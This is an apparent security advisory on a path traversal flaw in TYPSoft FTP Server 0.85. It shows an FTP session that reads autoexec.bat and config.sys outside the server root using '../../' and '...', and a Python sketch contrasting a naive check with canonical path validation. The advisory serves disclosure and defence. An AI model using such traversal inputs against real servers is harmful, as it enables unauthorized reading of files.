COMMAND

    TYPSoft

SYSTEMS AFFECTED

    TYPSoft FTP Server 0.85

PROBLEM

    Joe Testa found the following.  A vulnerability exists which allows a
    remote attacker to break out of the FTP root using relative paths
    (i.e. '...').  The following is an illustration of the problem:

        % ftp localhost
        Connected to xxxxxxxxxx.rh.rit.edu.
        220 TYPSoft FTP Server 0.85 ready...
        User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
        331 Password required for jdog.
        Password:
        230 User jdog logged in.
        ftp> pwd
        257 "/C:/directory/directory/" is current directory.
        ftp> get ../../autoexec.bat
        200 Port command successful.
        150 Opening data connection for ../../autoexec.bat.
        226 Transfer complete.
        ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
        ftp> cd ..
        501 CWD failed. No permission
        ftp> cd ...
        250 CWD command successful. "/C:/directory/directory/.../" is current directory.
        ftp> pwd
        257 "/C:/directory/directory/.../" is current directory.
        ftp> get config.sys
        200 Port command successful.
        150 Opening data connection for config.sys.
        226 Transfer complete.
        ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
        ftp>
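
    The session above refuses "cd .." but accepts "../../autoexec.bat"
    and "...".  The following is an added example, not TYPSoft code: it
    contrasts a check that only refuses the literal ".." (an assumed model
    of the weak behaviour) with canonicalising the path and comparing it
    to the root.  The names naive_allows and resolve are hypothetical, and
    it assumes the host treats each dot past the first as one level up.

```python
import posixpath

FTP_ROOT = "/C:/directory/directory"   # root as reported by PWD in the transcript

def naive_allows(arg):
    # Assumed model of the weak check: only the literal argument ".." is refused.
    return arg != ".."

def resolve(cwd, arg, root=FTP_ROOT):
    """Canonicalise a client path; return it if inside root, else None."""
    arg = arg.replace("\\", "/")
    path = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    parts = []
    for comp in path.split("/"):
        if comp in ("", "."):
            continue
        if set(comp) == {"."}:
            # "..", "...", "....": assume each dot past the first climbs one level
            for _ in range(len(comp) - 1):
                if not parts:
                    return None
                parts.pop()
            continue
        parts.append(comp)
    canon = "/" + "/".join(parts)
    inside = canon == root or canon.startswith(root + "/")
    return canon if inside else None

if __name__ == "__main__":
    for arg in ("..", "...", "../../autoexec.bat", "pub/../readme.txt"):
        print(f"{arg!r:24} naive={naive_allows(arg)!s:5} hardened={resolve(FTP_ROOT, arg)}")
```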

SOLUTION

    Fix available.